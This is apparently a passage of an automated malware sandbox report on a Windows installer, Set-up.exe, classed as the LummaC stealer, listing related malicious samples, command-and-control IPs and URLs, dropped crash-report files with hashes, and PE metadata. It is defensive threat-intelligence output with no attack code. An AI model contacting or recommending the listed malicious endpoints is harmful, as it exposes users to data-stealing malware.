                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    TimeTypeDescription
                                                                    05:42:14API Interceptor2x Sleep call for process: Set-up.exe modified
                                                                    05:42:40API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                              Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                Solara.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        188.114.97.3AeYgxx6XFk.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
                                                                                        http://host.cloudsonicwave.comGet hashmaliciousUnknownBrowse
                                                                                        • host.cloudsonicwave.com/favicon.ico
                                                                                        alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.avantfize.shop/q8x9/
                                                                                        foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.bayarcepat19.click/fxts/
                                                                                        RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                        octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                        • servicetelemetryserver.shop/api/index.php
                                                                                        1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                                                                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.launchdreamidea.xyz/bd77/
                                                                                        http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                                                                        • embittermentdc.com/favicon.ico
                                                                                        scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • paste.ee/d/gvOd3
                                                                                        188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                                        • touxzw.ir/sirr/five/fre.php
                                                                                        lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                        10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                        • www.airgame.store/ojib/
                                                                                        Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.cc101.pro/59fb/
                                                                                        octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                        • servicetelemetryserver.shop/api/index.php
                                                                                        bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rtprajalojago.live/2uvi/
                                                                                        lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.serverplay.live/71nl/
                                                                                        sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.cc101.pro/0r21/
                                                                                        E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/VO2TX
                                                                                        QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/fOmsJ2bL/download
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        drawwyobstacw.sbsWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        vennurviot.sbsWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.46.170
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.46.170
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.140.193
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.46.170
                                                                                        condifendteu.sbsWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.141.136
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.141.136
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.141.136
                                                                                        670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.79.35
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.141.136
                                                                                        steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        C5u5BZq8gj.exeGet hashmaliciousVidarBrowse
                                                                                        • 104.102.49.254
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        hD2EOjfpfW.exeGet hashmaliciousVidarBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.102.49.254
                                                                                        mathcucom.sbsWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        ASmartCore_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Solara.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.11.89
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.206.204
                                                                                        SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.64.41.3
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.53.8
                                                                                        • 188.114.97.3
                                                                                        • 188.114.96.3
                                                                                        • 172.67.152.13
                                                                                        • 104.21.30.221
                                                                                        • 172.67.141.136
                                                                                        • 104.102.49.254
                                                                                        • 172.67.140.193
                                                                                        • 104.21.77.78
                                                                                        No context
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.12713315719208
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ljRU3MX0BU/ojRSetOruLIAzuiFECZ24IO8t:hRuMkBU/ojZ/LIAzuiFPY4IO8t
                                                                                        MD5:2331A9058FC32F968F1390C4B53FDBC7
                                                                                        SHA1:D5BF9A9B5FD6DA1CDFBAB3054058669943C7A0DC
                                                                                        SHA-256:E732C00CD4AD1FBB678F3AA80C0DDFE2A5FB5D89DA6318797235DE1C0E9C484A
                                                                                        SHA-512:ED79DB42AF84C581247D71ED5C33A0607FE3D6B1BF54361D7AFA5E80912908E54AD4363E5B42665A6013EBE6C5690730B8CEFB5999C18FDF21B523CB0F79CC72
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.8.6.1.4.4.0.5.0.6.5.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.8.6.1.4.4.4.7.2.5.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.f.0.c.8.6.1.-.a.e.9.1.-.4.1.e.5.-.a.5.7.1.-.8.f.8.d.1.9.1.f.c.9.6.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.0.e.6.3.0.5.-.9.6.4.2.-.4.8.f.5.-.8.7.5.c.-.6.5.5.4.1.7.3.c.d.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.-.u.p...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.c.i.T.E...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.f.4.-.0.0.0.1.-.0.0.1.4.-.8.b.d.2.-.6.b.2.7.5.4.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.7.b.b.6.9.d.d.7.1.0.3.4.2.2.9.0.4.a.c.a.1.a.4.3.2.7.7.1.f.c.0.0.0.0.0.9.0.4.!.0.0.0.0.b.7.9.c.e.5.0.d.c.a.b.c.1.4.5.5.5.5.a.3.6.e.7.d.9.7.f.3.4.1.6.4.4.1.0.7.1.5.7.b.!.S.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 09:42:24 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):134188
                                                                                        Entropy (8bit):2.0465899784269173
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+GN1vjSKBgNSheKnJoRBx9fs3Jd1Sv/QRS:++ILyJoXfstSv/Q
                                                                                        MD5:3EB8709A9084E0DC806E543696F79D2E
                                                                                        SHA1:A361E191616C24D6D5E55251EAFF9B3F64E78729
                                                                                        SHA-256:4691D1EE252E482F3A1481CC8F037B50AE2A4E12B90819579ED9681B32162853
                                                                                        SHA-512:DDAFB945958C23105DC5FBA10B7371A7F71B303EE8B7B8BE85A62919F1B52877A533A48BE4B1CB890EC62C93099B35792A0BBA4B3C6F281BBB9EBA12E9471984
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:MDMP..a..... ..........g........................H...(.......T...p%...........R..........`.......8...........T...........xB...............%...........'..............................................................................eJ......H(......GenuineIntel............T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8354
                                                                                        Entropy (8bit):3.7003729787765485
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJMAm6iw76Y9pSU9eYHqgmfNRpr189bsWsfEEm:R6lXJMZ6iw76YDSU9eYHqgmfNes1fO
                                                                                        MD5:23A57E21F2526728BF79E51255BEADAB
                                                                                        SHA1:A4CD63467349475A7E6A351EB5DBA4B0335EE60B
                                                                                        SHA-256:0276DA1C42CC0A17DE823A3F0E073F2EB031D1BA0593CA2D7E9621CDEBC70CBD
                                                                                        SHA-512:B7C4D876939AC5BACFC15560C43505C5D99F3E5DAF128D2A30683285E2616B09DF06B0610D18735178AC66771132A9834C0E961548C8BC5294172A75C8F087B8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.1.2.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4664
                                                                                        Entropy (8bit):4.496741969809943
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsRJg77aI9AbWpW8VY5Ym8M4JuqFMi+q8xFU7Yb6YM4Hd:uIjfjI7iq7VJJUi8U79YM4Hd
                                                                                        MD5:0E2A733289B51856726560B355F59864
                                                                                        SHA1:0BB44DEBD47D677DB7268C410A556B757C709D96
                                                                                        SHA-256:76095A89C700215029A54B6B6CFDFDE18A2EFA9BC61420CD20D996E91EA39119
                                                                                        SHA-512:E2C9DC2065A130EBFB0C1E6D0BB42BF61D6008EA7F8ED2D717AA1476C2C4E56CB8987F703713C613CD981FF292E2064AE0A98F68DE7AC8D766B0FC3605A4AD7C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465509726421408
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:1IXfpi67eLPU9skLmb0b4FWSPKaJG8nAgejZMMhA2gX4WABl0uNvdwBCswSbn:2XD94FWlLZMM6YFHZ+n
                                                                                        MD5:00BFAC98A536C86909DADC7CC02EFDD3
                                                                                        SHA1:0A3DC4CB1CED0530BEAD825EF69482572731B01E
                                                                                        SHA-256:797450A4C2635DB9BD2C80B9E790D5DA00CFB66406056DFE6F8CED90EA646CD1
                                                                                        SHA-512:36FF5C6C47B0652B08A670C543317EA02F084890AFB0130422D22404D3594FCB3040D5413A4D8E7B52AB3378A3E54188739AAEF841B0C880F6DBDC68E6C0F690
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...4T................................................................................................................................................................................................................................................................................................................................................`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.988381481741982
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 98.99%
                                                                                        • InstallShield setup (43055/19) 0.43%
                                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                        • Visual Basic Script (13500/0) 0.13%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:Set-up.exe
                                                                                        File size:2'729'072 bytes
                                                                                        MD5:4b923f3600f76ea3fcf20959d94369ac
                                                                                        SHA1:b79ce50dcabc145555a36e7d97f341644107157b
                                                                                        SHA256:b80b75d889d42db1bbd9bc8b748c5c9390bb015286931579c1bcac7562de6a56
                                                                                        SHA512:54fc3dcb0ff35a97860c0f0b36cdfa310f0b2b918cd810fdca8183faaa150c17b978b6f79c91c65abc7a784cc3ee8ba6b62c29592f87018739096e52608a9031
                                                                                        SSDEEP:49152:gGSXoV72tpV9XE8Gwi1aCvYMdRluSBw44RGLaLgPZ:Q4OE5wiICvYMpfL1
                                                                                        TLSH:04C59D22BE8FC532D4A111B1967DAF1F8418A6767F7181D7B2C01A3AE5103E31A3E767
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b..rk...k.@rk.....@rk...i.@rk.RichArk................
                                                                                        Icon Hash:2f232d67b7934633
                                                                                        Entrypoint:0x59ea9c
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
